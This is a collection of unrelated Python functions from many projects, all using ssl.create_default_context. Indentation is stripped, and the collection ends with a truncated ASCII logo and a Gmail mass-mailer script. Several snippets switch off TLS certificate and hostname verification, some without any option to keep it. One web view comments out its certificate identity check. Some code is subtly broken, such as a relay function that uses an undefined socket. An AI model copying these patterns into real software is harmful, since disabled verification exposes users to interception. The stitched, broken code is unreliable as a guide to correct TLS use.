def open_url(url, timeout=None, verify=True, **kwargs):
'''Returns a urllib.request object given a URL as a string
Optional parameters include
* timeout - Timeout value for request as int
* verify - Certificate validation as boolean
* headers - Add many headers as Header_Name='Val', Header_Name2='Val2'
'''
req = urllib.request.Request(url)
if type(kwargs) is dict:
for key in kwargs.keys():
header = key.replace('_', '-')
req.add_header(header, kwargs[key])
try:
if verify:
ctx = ssl.create_default_context(cafile=os.environ['SSL_CERT_FILE'])
urlobj = urllib.request.urlopen(req, timeout=timeout, context=ctx)
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
urlobj = urllib.request.urlopen(req, timeout=timeout, context=ctx)
return urlobj
except urllib.request.HTTPError as e:
logging.error('HTTPError: %s for %s', str(e.code), url)
if e.code == 304:
return None
except urllib.request.URLError as e:
logging.error('URLError: %s for %s', str(e.reason), url)
raise Exception('GetURL Failed')
def __init__(self, nexenta):
cfg = ReadConfig()
username = cfg.get_option(nexenta['hostname'], 'api_user')
password = cfg.get_option(nexenta['hostname'], 'api_pass')
self.nms_retry = cfg.get_option(nexenta['hostname'], 'nms_retry')
if not username or not password:
raise CritError("No connection info configured for %s" % nexenta['hostname'])
if not self.nms_retry:
self.nms_retry = 2
ssl = cfg.get_option(nexenta['hostname'], 'api_ssl')
insecure = cfg.get_option(nexenta['hostname'], 'api_ssl_insecure')
self.https = False
if ssl != "ON":
protocol = 'http'
else:
import ssl
protocol = 'https'
self.https = True
if insecure == "ON":
self.ctx = ssl.create_default_context()
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
else:
self.ctx = ssl.create_default_context()
port = cfg.get_option(nexenta['hostname'], 'api_port')
if not port:
port = 2000
self.base64_string = base64.encodestring('%s:%s' % (username, password))[:-1]
self.url = '%s://%s:%s/rest/nms/ <%s://%s:%s/rest/nms/>' % (protocol, nexenta['ip'], port, protocol,
nexenta['ip'], port)
def _InitSSLContext(self, cafile=None,
disable_ssl_certificate_validation=False):
"""Creates a ssl.SSLContext with the given settings.
Args:
cafile: A str identifying the resolved path to the cafile. If not set,
this will use the system default cafile.
disable_ssl_certificate_validation: A boolean indicating whether
certificate verification is disabled. For security purposes, it is
highly recommended that certificate verification remain enabled.
Returns:
An ssl.SSLContext instance, or None if the version of Python being used
doesn't support it.
"""
# Attempt to create a context; this should succeed in Python 2 versions
# 2.7.9+ and Python 3 versions 3.4+.
try:
if disable_ssl_certificate_validation:
ssl._create_default_https_context = ssl._create_unverified_context
ssl_context = ssl.create_default_context()
else:
ssl_context = ssl.create_default_context(cafile=cafile)
except AttributeError:
# Earlier versions lack ssl.create_default_context()
# Rather than raising the exception, no context will be provided for
# legacy support. Of course, this means no certificate validation is
# taking place!
return None
return ssl_context
def url_open_resp(url):
global opener, login_user, login_pass
if not opener:
print "building opener"
if login_user:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
else:
opener = urllib2.build_opener()
urllib2.install_opener(opener)
if login_user:
params = None
params = urllib.urlencode(dict(username=login_user,
password=login_pass))
if not accept_all_certs:
response = urllib2.urlopen(url, data=params)
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib2.urlopen(url, data=params, context=ctx)
return response
if not accept_all_certs:
response = urllib2.urlopen(url)
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib2.urlopen(url, context=ctx)
return response
def setupHttpConn(self, url, cacert=None):
(protocol, url) = url.split('://', 1)
location = None
conn = None
port = 443
if (url.find('/') >= 0):
(server, location) = url.split('/', 1)
else:
server = url
if ':' in server:
(server, port) = server.split(':')
if protocol == 'http':
conn = httplib.HTTPConnection(server)
elif protocol == 'https':
try:
sslContext = ssl.create_default_context()
if cacert is not None:
sslContext = ssl.create_default_context(cafile=cacert)
conn = httplib.HTTPSConnection(server, context=sslContext)
except AttributeError:
conn = httplib.HTTPSConnection(server, port, None, cacert)
else:
print "Error, unknown protocol %s" % protocol
return None
return conn
def _setup_http_conn(url, cacert=None):
"""Prepare http connection object and return it."""
(protocol, url) = url.split('://', 1)
conn = None
if protocol == 'http':
port = 80
else:
port = 443
if url.find('/') >= 0:
(server, _) = url.split('/', 1)
else:
server = url
if ':' in server:
(server, portstr) = server.split(':', 1)
port = int(portstr)
if protocol == 'http':
conn = httplib.HTTPConnection(server, port=port)
elif protocol == 'https':
try:
ssl_context = ssl.create_default_context()
if cacert is not None:
ssl_context = ssl.create_default_context(cafile=cacert)
conn = httplib.HTTPSConnection(server, port=port,
context=ssl_context)
except AttributeError:
conn = httplib.HTTPSConnection(server, port, None, cacert)
else:
print "Error, unknown protocol %s" % protocol
return None
return conn
def connect(self):
"""
Connect to a host on a given (SSL) port.
If ca_file is pointing somewhere, use it to check Server Certificate.
Redefined/copied and extended from httplib.py.
"""
sock = self._create_connection((self.host, self.port),
self.timeout, self.source_address)
if self._tunnel_host:
self.sock = sock
self._tunnel()
if self.ca_file:
context = ssl.create_default_context(
purpose=ssl.Purpose.SERVER_AUTH,
cafile=self.ca_file)
else:
context = ssl.create_default_context(
purpose=ssl.Purpose.SERVER_AUTH)
if self.key_file or self.cert_file:
context.load_cert_chain(certfile=self.cert_file,
keyfile=self.key_file)
self.sock = context.wrap_socket(sock, server_side=False,
server_hostname=self.host)
def verify_cafile(cafile=None, cadata=None):
try:
create_default_context(cafile=cafile, cadata=cadata)
except IOError as e:
if cafile:
LOG.error('Invalid cafile %s: %s' % (cafile, e))
else:
LOG.error('Invalid cadata: %s' % e)
sys.exit(1)
def compile(cls, uri, relay=None):
scheme, _, uri = uri.partition('://')
url = urllib.parse.urlparse('s://'+uri)
rawprotos = scheme.split('+')
err_str, protos = proto.get_protos(rawprotos)
if err_str:
raise argparse.ArgumentTypeError(err_str)
if 'ssl' in rawprotos or 'secure' in rawprotos:
import ssl
sslserver = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
sslclient = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if 'ssl' in rawprotos:
sslclient.check_hostname = False
sslclient.verify_mode = ssl.CERT_NONE
else:
sslserver = sslclient = None
protonames = [i.name for i in protos]
if 'pack' in protonames and relay and relay != cls.DIRECT:
raise argparse.ArgumentTypeError('pack protocol cannot relay to other proxy')
urlpath, _, plugins = url.path.partition(',')
urlpath, _, lbind = urlpath.partition('@')
plugins = plugins.split(',') if plugins else None
cipher, _, loc = url.netloc.rpartition('@')
if cipher:
from .cipher import get_cipher
if ':' not in cipher:
try:
cipher = base64.b64decode(cipher).decode()
except Exception:
pass
if ':' not in cipher:
raise argparse.ArgumentTypeError('userinfo must be "cipher:key"')
err_str, cipher = get_cipher(cipher)
if err_str:
raise argparse.ArgumentTypeError(err_str)
if plugins:
from .plugin import get_plugin
for name in plugins:
if not name: continue
err_str, plugin = get_plugin(name)
if err_str:
raise argparse.ArgumentTypeError(err_str)
cipher.plugins.append(plugin)
match = cls.compile_rule(url.query) if url.query else None
if loc:
host_name, _, port = loc.partition(':')
port = int(port) if port else (22 if 'ssh' in rawprotos else 8080)
else:
host_name = port = None
return ProxyURI(protos=protos, rproto=protos[0], cipher=cipher, auth=url.fragment.encode(), \
match=match, bind=loc or urlpath, host_name=host_name, port=port, \
unix=not loc, lbind=lbind, sslclient=sslclient, sslserver=sslserver, \
alive=True, direct='direct' in protonames, tunnel='tunnel' in protonames, \
reuse='pack' in protonames or relay and relay.reuse, backward='in' in rawprotos, \
ssh='ssh' in rawprotos, relay=relay)
def getSSLcontext(servercert="", serverkey="", clientcert="", clientkey="", cacerts="", keypassword=""):
"""creates an SSL context and caches it, so you have to set the parameters correctly before doing anything"""
global __ssl_client_context, __ssl_server_context
if not ssl:
raise ValueError("SSL requested but ssl module is not available")
else:
# Theoretically, the SSL support works on python versions older than the ones checked below.
# however, a few important security changes were included in these versions
# (disabling vulnerable cyphers and protocols by default). So change this at your own peril.
if sys.version_info < (2, 7, 11):
raise RuntimeError("need Python 2.7.11 or newer to properly use SSL")
if (3, 0) < sys.version_info < (3, 4, 4):
raise RuntimeError("need Python 3.4.4 or newer to properly use SSL")
if servercert:
if clientcert:
raise ValueError("can't have both server cert and client cert")
# server context
if __ssl_server_context:
return __ssl_server_context
if not os.path.isfile(servercert):
raise IOError("server cert file not found")
if serverkey and not os.path.isfile(serverkey):
raise IOError("server key file not found")
__ssl_server_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
__ssl_server_context.load_cert_chain(servercert, serverkey or None, keypassword or None)
if cacerts:
if os.path.isdir(cacerts):
__ssl_server_context.load_verify_locations(capath=cacerts)
else:
__ssl_server_context.load_verify_locations(cafile=cacerts)
if config.SSL_REQUIRECLIENTCERT:
__ssl_server_context.verify_mode = ssl.CERT_REQUIRED # 2-way ssl, server+client certs
else:
__ssl_server_context.verify_mode = ssl.CERT_NONE # 1-way ssl, server cert only
return __ssl_server_context
else:
# client context
if __ssl_client_context:
return __ssl_client_context
__ssl_client_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if clientcert:
if not os.path.isfile(clientcert):
raise IOError("client cert file not found")
__ssl_client_context.load_cert_chain(clientcert, clientkey or None, keypassword or None)
if cacerts:
if os.path.isdir(cacerts):
__ssl_client_context.load_verify_locations(capath=cacerts)
else:
__ssl_client_context.load_verify_locations(cafile=cacerts)
return __ssl_client_context
def create_thriftpy_context(server_side=False, ciphers=None):
"""Backport create_default_context for older python versions.
The SSLContext has some default security options, you can disable them
manually, for example::
from thriftpy.transport import _ssl
context = _ssl.create_thriftpy_context()
context.options &= ~_ssl.OP_NO_SSLv3
You can do the same to enable compression.
"""
if MODERN_SSL:
if server_side:
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
else:
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if ciphers:
context.set_ciphers(ciphers)
else:
context = SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= OP_NO_SSLv2
context.options |= OP_NO_SSLv3
context.options |= OP_NO_COMPRESSION
# server/client default options
if server_side:
context.options |= OP_CIPHER_SERVER_PREFERENCE
context.options |= OP_SINGLE_DH_USE
context.options |= OP_SINGLE_ECDH_USE
else:
context.verify_mode = ssl.CERT_REQUIRED
# context.check_hostname = True
warnings.warn(
"ssl check hostname support disabled, upgrade your python",
InsecurePlatformWarning)
# Platform-specific: Python 2.6
if getattr(context, 'supports_set_ciphers', True):
if ciphers:
context.set_ciphers(ciphers)
else:
warnings.warn("ssl ciphers support disabled, upgrade your python",
InsecurePlatformWarning)
return context
def create_ssl_context(verify=True, cafile=None, capath=None):
"""Set up the SSL context.
"""
# This is somewhat tricky to do it right and still keep it
# compatible across various Python versions.
try:
# The easiest and most secure way.
# Requires either Python 2.7.9 or 3.4 or newer.
context = ssl.create_default_context(cafile=cafile, capath=capath)
if not verify:
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
except AttributeError:
# ssl.create_default_context() is not available.
try:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
except AttributeError:
# We don't even have the SSLContext class. This smells
# Python 2.7.8 or 3.1 or older. Bad luck.
return None
context.options |= ssl.OP_NO_SSLv2
context.options |= ssl.OP_NO_SSLv3
if verify:
context.verify_mode = ssl.CERT_REQUIRED
if cafile or capath:
context.load_verify_locations(cafile, capath)
else:
context.set_default_verify_paths()
else:
context.verify_mode = ssl.CERT_NONE
return context
def main(args, cfg, backend):
users = {'console': {'sock': sys.stdin}}
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile = cfg['defaults']['cert'], keyfile = cfg['defaults']['key'])
svsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
svsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
svsock.bind((args['listen'], args['port']))
svsock.listen(socket.SOMAXCONN)
listen = [svsock, sys.stdin]
while True:
socks = select.select(listen, [], [])
for sock in socks[0]:
if sock == sys.stdin:
line = sys.stdin.readline()
if line == '\n':
continue
handle.cmd(None, line, {'arg': args, 'cfg': cfg, 'backend': backend, 'users': users, 'sock': sock, 'user': '******'}, 'main2')
pass
elif sock == svsock:
newsock, fromaddr = sock.accept()
listen.append(context.wrap_socket(newsock, server_side=True))
else:
try:
u = None
for _ in users:
if users[_]['sock'] == sock: u = _
handle.recv(sock, {'arg': args, 'cfg': cfg, 'backend': backend, 'users': users, 'sock': sock, 'user': u})
except socket.error, e:
todel = None
for _ in users:
if users[_]['sock'] == sock: todel = _
if todel is not None: del users[todel]
sock.close()
listen.remove(sock)
def teardown_http_get(e):
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
p = os.path.dirname(os.path.abspath(__file__))
response = urllib2.urlopen('https://localhost:8088/shutdown', context=ctx)
html = response.read()
def add(request):
instance = Person(verified=False, ip="127.0.0.1",
last_updated=datetime.datetime.utcfromtimestamp(0))
form = AddPersonForm(request.POST or None, instance=instance)
if form.is_valid():
person = form.save(commit=False)
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
host = resolve_location(person)
connection = HTTPSConnection(host=host, port=8080,
context=ssl_context)
connection.request("GET", reverse("directory:info"))
response = connection.getresponse()
data = JSONParser().parse(response)
cert = connection.sock.getpeercert()
connection.close()
serializer = PublicPersonSerializer(person, data=data)
cn = None
#for key, value in cert["subject"]:
# if key == "commonName":
# cn = value
# break
#if cn == person.location and serializer.is_valid():
if serializer.is_valid():
serializer.save()
return HttpResponseRedirect(reverse("directory:index"))
context = {"form": form, "section": "directory"}
return render(request, "person_form.html", context)
def __init__(self, apikey, server):
self.apikey = apikey
self.server = server
self.ctx = ssl.create_default_context()
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
def create_ssl_context():
if not CONF.use_ssl:
return
MIN_VERSION = (2, 7, 9)
if sys.version_info < MIN_VERSION:
LOG.warning(_LW('Unable to use SSL in this version of Python: '
'%{current}, please ensure your version of Python is '
'greater than %{min} to enable this feature.'),
{'current': '.'.join(map(str, sys.version_info[:3])),
'min': '.'.join(map(str, MIN_VERSION))})
return
context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
if CONF.ssl_cert_path and CONF.ssl_key_path:
try:
context.load_cert_chain(CONF.ssl_cert_path, CONF.ssl_key_path)
except IOError as exc:
LOG.warning(_LW('Failed to load certificate or key from defined '
'locations: %{cert} and %{key}, will continue to '
'run with the default settings: %{exc}'),
{'cert': CONF.ssl_cert_path, 'key': CONF.ssl_key_path,
'exc': exc})
except ssl.SSLError as exc:
LOG.warning(_LW('There was a problem with the loaded certificate '
'and key, will continue to run with the default '
'settings: %s'), exc)
return context
def ssl_context_for(purpose, ca_certs, own_cert, dh_params=None):
ssl_context = ssl.create_default_context(purpose, cafile=ca_certs)
ssl_context.load_cert_chain(own_cert)
if ca_certs is None:
ssl_context.load_default_certs(purpose)
else:
ssl_context.load_verify_locations(cafile=ca_certs)
# Force client cert requirement too
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.verify_flags |= ssl.VERIFY_X509_STRICT
# Since we use only DH KEX later, we have to provide DH params. They aren't
# automatically generated. There are no compiled in ones. If you don't do
# this, you get weird "No shared cipher" errors at the client hello.
if purpose == ssl.Purpose.CLIENT_AUTH:
ssl_context.load_dh_params(dh_params)
# Enforce encryption and authentication.
# Enforce perfect forward secrecy—only provided by Diffie-Hellman ephemeral
# so far.
# Enforce RSA-based authentication because of better failure modes.
# Enforce 'high'—higher security suites.
# See http://security.stackexchange.com/questions/5096/rsa-vs-dsa-for-ssh-authentication-keys/46781#46781.
# TODO: Figure out how to enforce *generically*, better hash suites, and
# not have outdated, slow, and known weaker ciphers like 3DES.
ssl_context.set_ciphers(_DEFAULT_TLS_CIPHERS)
ssl_context.set_alpn_protocols(['simplevoip/0'])
return ssl_context
def ssl_context(self):
"""SSLContext instance for https requests.
Lazy property, creates context on demand.
"""
if self._ssl_context is None:
if not self._verify_ssl:
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.options |= ssl.OP_NO_SSLv3
sslcontext.options |= _SSL_OP_NO_COMPRESSION
sslcontext.set_default_verify_paths()
elif _SSH_HAS_CREATE_DEFAULT_CONTEXT:
# Python 3.4+
sslcontext = ssl.create_default_context()
else: # pragma: no cover
# Fallback for Python 3.3.
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.options |= ssl.OP_NO_SSLv3
sslcontext.options |= _SSL_OP_NO_COMPRESSION
sslcontext.set_default_verify_paths()
sslcontext.verify_mode = ssl.CERT_REQUIRED
self._ssl_context = sslcontext
return self._ssl_context
def requires():
print "** COORDINATOR **"
# print redwood_host
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# now query the metadata service so I have the mapping of bundle_uuid & file names -> file_uuid
print str("https://"+redwood_host+":8444/entities?page=0")
json_str = urlopen(str("https://"+redwood_host+":8444/entities?page=0"), context=ctx).read()
metadata_struct = json.loads(json_str)
print "** METADATA TOTAL PAGES: "+str(metadata_struct["totalPages"])
for i in range(0, metadata_struct["totalPages"]):
print "** CURRENT METADATA TOTAL PAGES: "+str(i)
json_str = urlopen(str("https://"+redwood_host+":8444/entities?page="+str(i)), context=ctx).read()
metadata_struct = json.loads(json_str)
for file_hash in metadata_struct["content"]:
bundle_uuid_filename_to_file_uuid[file_hash["gnosId"]+"_"+file_hash["fileName"]] = file_hash["id"]
#print bundle_uuid_filename_to_file_uuid
# HACK!!! Please remove once the behavior has been fixed in the workflow!!
if file_hash["fileName"].endswith(".sortedByCoord.md.bam"):
bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_sortedByCoord.md.bam"] = file_hash[
"id"]
if file_hash["fileName"].endswith(".tar.gz"):
bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_tar.gz"] = file_hash[
"id"]
if file_hash["fileName"].endswith(".wiggle.bg"):
bundle_uuid_filename_to_file_uuid[file_hash["gnosId"] + "_wiggle.bg"] = file_hash[
"id"]
def _ssl_verified_context(cafile):
context = None
try:
context = ssl.create_default_context(cafile=cafile)
except AttributeError: # no ssl.create_default_context
pass
return context
def test_conflict_SSLContext_with_ws_url(self):
'''
ApplicationRunner must raise an exception if given an ssl value that is
an instance of SSLContext, but only a "ws:" URL.
'''
import ssl
try:
# Try to create an SSLContext, to be as rigorous as we can be
# by avoiding making assumptions about the ApplicationRunner
# implementation. If we happen to be on a Python that has no
# SSLContext, we pass ssl=True, which will simply cause this
# test to degenerate to the behavior of
# test_conflict_SSL_True_with_ws_url (above). In fact, at the
# moment (2015-05-10), none of this matters because the
# ApplicationRunner implementation does not check to require
# that its ssl argument is either a bool or an SSLContext. But
# that may change, so we should be careful.
ssl.create_default_context
except AttributeError:
context = True
else:
context = ssl.create_default_context()
loop = Mock()
loop.run_until_complete = Mock(return_value=(Mock(), Mock()))
with patch.object(asyncio, 'get_event_loop', return_value=loop):
runner = ApplicationRunner(u'ws://127.0.0.1:8080/wss', u'realm',
ssl=context)
error = ('^ssl argument value passed to ApplicationRunner '
'conflicts with the "ws:" prefix of the url '
'argument\. Did you mean to use "wss:"\?$')
self._assertRaisesRegex(Exception, error, runner.run, '_unused_')
def connect(self) -> None:
"""Creates socket and binds it to given server and port
Notes:
Only connects to the server the object was initialized with
All IRC protocol should be handled by the caller
"""
logger = logging.getLogger(__name__)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
logger.debug(f'Timeout set to {self.timeout}')
logger.info(f'Attempting to bind socket to {self.server}:{self.port}')
try:
self.sock.connect((self.server, self.port))
except socket.timeout as inst:
logger.warning(f'Failed to bind socket to {self.server}:{self.port} before timeout',
exc_info=inst)
self.reconnect()
logger.info(f'Connected to {self.server}:{self.port}')
if self.ssl:
logger.info('Creating an SSL context and wrapping the socket')
context = ssl.create_default_context()
try:
self.sock = context.wrap_socket(self.sock, server_hostname=self.server)
except socket.timeout as inst:
logger.warning('SSL handshake attempt timed out', exc_info=inst)
self.reconnect()
logger.info('SSL Socket ready for use')
else:
logger.info('Socket ready for use')
def _request(self, url, method='GET', data=None, cxn=None):
"""
send the request, return response obj
"""
if not cxn:
ctxt = ssl.create_default_context()
if not self.validate_ssl:
ctxt.check_hostname = False
ctxt.verify_mode = ssl.CERT_NONE
cxn = httplib.HTTPSConnection(self.host, self.port, strict=True, timeout=self.timeout, context=ctxt)
headers = {
"Accept": "application/json"
}
if self.user:
auth = 'Basic ' + base64.urlsafe_b64encode("%s:%s" % (self.user, self.password))
headers['Authorization'] = auth
if data:
data = json.dumps(data)
headers["Content-length"] = len(data)
headers["Content-type"] = "application/json"
# print "%s %s headers:'%s' data:'%s' " % (method, url, str(headers), str(data))
cxn.request(method, url, data, headers)
return cxn.getresponse()
def get_http2_ssl_context():
"""
This function creates an SSLContext object that is suitably configured for
HTTP/2. If you're working with Python TLS directly, you'll want to do the
exact same setup as this function does.
"""
# Get the basic context from the standard library.
ctx = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
# RFC 7540 Section 9.2: Implementations of HTTP/2 MUST use TLS version 1.2
# or higher. Disable TLS 1.1 and lower.
ctx.options |= (
ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
)
# RFC 7540 Section 9.2.1: A deployment of HTTP/2 over TLS 1.2 MUST disable
# compression.
ctx.options |= ssl.OP_NO_COMPRESSION
# RFC 7540 Section 9.2.2: "deployments of HTTP/2 that use TLS 1.2 MUST
# support TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256". In practice, the
# blacklist defined in this section allows only the AES GCM and ChaCha20
# cipher suites with ephemeral key negotiation.
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
# We want to negotiate using NPN and ALPN. ALPN is mandatory, but NPN may
# be absent, so allow that. This setup allows for negotiation of HTTP/1.1.
ctx.set_alpn_protocols(["h2", "http/1.1"])
try:
ctx.set_npn_protocols(["h2", "http/1.1"])
except NotImplementedError:
pass
return ctx
def handle_connect(self):
if self.use_ssl:
self.del_channel()
sslctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
sslsock = sslctx.wrap_socket(self.socket,
suppress_ragged_eofs=False, do_handshake_on_connect=False,
server_hostname=self.ssl_server_hostname)
# Keep attempting handshake until successful
while True:
try:
sslsock.do_handshake()
break
except ssl.SSLError as error:
if error.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([sslsock], [], [])
elif error.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [sslsock], [])
else:
raise
sslsock.setblocking(1)
self.set_socket(sslsock)
if self.verbose:
print("Connected!", file=sys.stderr)
if self.password:
self.write(('PASS', self.password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
def get_articles(link):
""" detect, select and copy all articles from a Legifrance page """
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
b = urllib.request.urlopen(link, context=ctx)
cs_article = b.read().decode("utf-8")
contents = []
new_article = Article()
buf = ""
for j in range(len(cs_article)):
buf += cs_article[j]
if len(buf) >= 21:
if buf == '<div class="article">':
new_article.name, j = get_something(cs_article,
'<div class="titreArt">',
'<a',
j)
text, j = get_something(cs_article,
'class="corpsArt">',
'</div>',
j)
new_article.contents = recover_article(text)
contents.append(new_article)
new_article = Article()
buf = buf[1:21]
return contents
def _additional_handlers(self):
handlers = []
if self.session.get('proxy'):
protocol, host, port = self._get_proxy()
if protocol and host and port:
handlers.append(
sockshandler.SocksiPyHandler(
protocol,
host,
port
)
)
else:
raise ChannelException(messages.channels.error_proxy_format)
# Skip certificate checks
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
handlers.append(urllib2.HTTPSHandler(context=ctx))
return handlers
def __init__(self, host, port):
self.context = ssl.create_default_context()
self.conn = self.context.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=host)
self.conn.connect((host, port))
self.f = self.conn.makefile('r+b', 0)
def run(pelican):
update_settings(pelican)
host = pelican.settings['IMAP_IMPORTER']['HOST']
user = pelican.settings['IMAP_IMPORTER']['USER']
folders = pelican.settings['IMAP_IMPORTER']['FOLDERS']
new_password = False
password = keyring.get_password('PELICAN_IMAP_IMPORTER', user)
if password is None:
password = get_password(user)
new_password = True
host = pelican.settings['IMAP_IMPORTER']['HOST']
# Connect
imap = None
try:
imap = imaplib.IMAP4(host)
context = ssl.create_default_context()
imap.starttls(context)
except Exception as e:
logger.critical(_log + "Couldn't connect to '" + host + "'")
logger.critical(_log + str(e))
exit()
# Login
try_again = True
fail_counter = 0
while try_again:
try:
imap.login(user, password)
try_again = False
except imaplib.IMAP4_SSL.error as e:
fail_counter += 1
logger.warning(_log + "Authentication failed!")
logger.warning(_log + "Make sure that the user name and password are correct")
if fail_counter > 3:
exit()
password = get_password(user)
new_password = True
# successful login
if new_password:
keyring.set_password('PELICAN_IMAP_IMPORTER', user, password)
for folder in folders:
imap.select(folder)
typ, data = imap.search(None, 'ALL')
for num in data[0].split():
typ, data = imap.fetch(num, '(RFC822)')
#imap.append('INBOX.Server.Comments', None, None, message=data[0][1])
msg = email.message_from_bytes(data[0][1])
if process_email(pelican.settings, msg):
del msg['X-PELICAN-IMAP-IMPORTER']
msg['X-PELICAN-IMAP-IMPORTER'] = 'processed-debug4'
imap.store(num, '+FLAGS', '\\Deleted') # delete email
imap.append(folder, '\\Seen', None, message=msg.as_bytes())
imap.expunge()
imap.logout()
def f():
conn = socket.socket(socket.AF_INET)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 5)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 15)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
# Use weakrefs to track how many of these are running
instanceTracker = InstanceTracker()
connections[time.time()] = instanceTracker
# TODO maybe make this configurable
if len(connections) > 320:
raise RuntimeError(
"Too many incoming P2P connections all at once")
h = self.dest.split("://")[-1]
h, p = h.split(":")[-2:]
conn.connect((h, int(p)))
if self.dest.startswith("https://") or self.dest.startswith(
"wss://"):
context = ssl.create_default_context()
context.wrap_socket(conn, server_hostname=h)
conn = context
# Wait for ready
for i in range(50):
r, w, x = select.select([], [sock], [], 0.1)
if w:
break
sendOOB = {}
# Using a list as an easy mutable global.
# Should there be an external addr we can tell them about, we stuff it in our header so they can memorize it.
# Note that this is secured via the same SSH tunnel, only the real server can send this.
if ExternalAddrs[0]:
sendOOB['WANHosts'] = getWanHostsString()
# Send our oob data header
sock.send(
json.dumps(sendOOB, separators=(',', ':')).encode() + b"\n")
oob = b''
# The first part of the data is reserved for an OOB header
while (1):
if self.closed:
raise RuntimeError("Closed at server side")
r, w, x = select.select([
sock,
], [], [], 1)
if r:
oob += sock.recv(4096)
if b"\n" in oob:
break
oob, overflow = oob.split(b"\n")
if self.password:
oob = json.loads(oob)
if not hmac.compare_digest(self.password, oob['password']):
raise RuntimeError(
"This Service requires a password component to the name, which must match"
)
# Send any data that was after the newline
conn.send(overflow)
while (1):
if self.closed:
raise RuntimeError("Closed at server side")
r, w, x = select.select([sock, conn], [], [], 1)
# Whichever one has data, shove it down the other one
for i in r:
try:
if i == sock:
d = i.recv(4096)
if d:
conn.send(d)
else:
raise Closed(
"Zero length read, probably closed")
else:
d = i.recv(4096)
if d:
sock.send(d)
else:
raise Closed(
"Zero length read, probably closed")
except Closed:
try:
sock.close()
except:
pass
try:
conn.close()
except:
pass
return
except:
logger.info(traceback.format_exc())
logger.info("socket closing")
try:
sock.close()
except:
pass
try:
conn.close()
except:
pass
return
def test_context_argument(self):
context = ssl.create_default_context(
cafile=CERT_selfsigned_pythontestdotnet)
response = urllib.urlopen("https://self-signed.pythontest.net",
context=context)
self.assertIn("Python", response.read())
██║░░░░░███████║░░███╔═╝░╚████╔╝░██╔████╔██║███████║██║██║░░░░░╚█████╗░
██║░░░░░██╔══██║██╔══╝░░░░╚██╔╝░░██║╚██╔╝██║██╔══██║██║██║░░░░░░╚═══██╗
███████╗██║░░██║███████╗░░░██║░░░██║░╚═╝░██║██║░░██║██║███████╗██████╔╝
╚══════╝╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝╚══════╝╚═════╝░
'''
print(logo)
print("\t\t\t\t\t\t Git - LazyProgrammerrr")
print("\nYou Can Press [b bright_red] (ctrl + c) [/b bright_red] to exit anytime.")
#try block with loop to interpret data from excel and setting up server
try:
while True:
email_input = c.input("\n[b magenta]Enter Your Email Here -> [/b magenta]")
#password_input = c.input("\n[b bright_yellow]Enter Your Password Here -> [/b bright_yellow]")
password_input = stdiomask.getpass(prompt='\nEnter Your Password Here -> ')
context = ssl.create_default_context()
port = 465
smtp_server = "smtp.gmail.com"
with smtplib.SMTP_SSL(smtp_server,port,context=context) as server:
try:
server.login(email_input,password_input)
print("\n[b bright_green]Logged In![/b bright_green]")
break
except:
print("\n[b bright_red]Wrong Email Id or Password! Please Check Again.[/b bright_red]\n")
print("\n(Email List) Choose from XLSX or CSV file!")
while True:
file_choose = c.input("\nEnter Here [b bright_red](xlsx) or (csv)[/b bright_red]-> ").casefold()
if file_choose == 'xlsx':
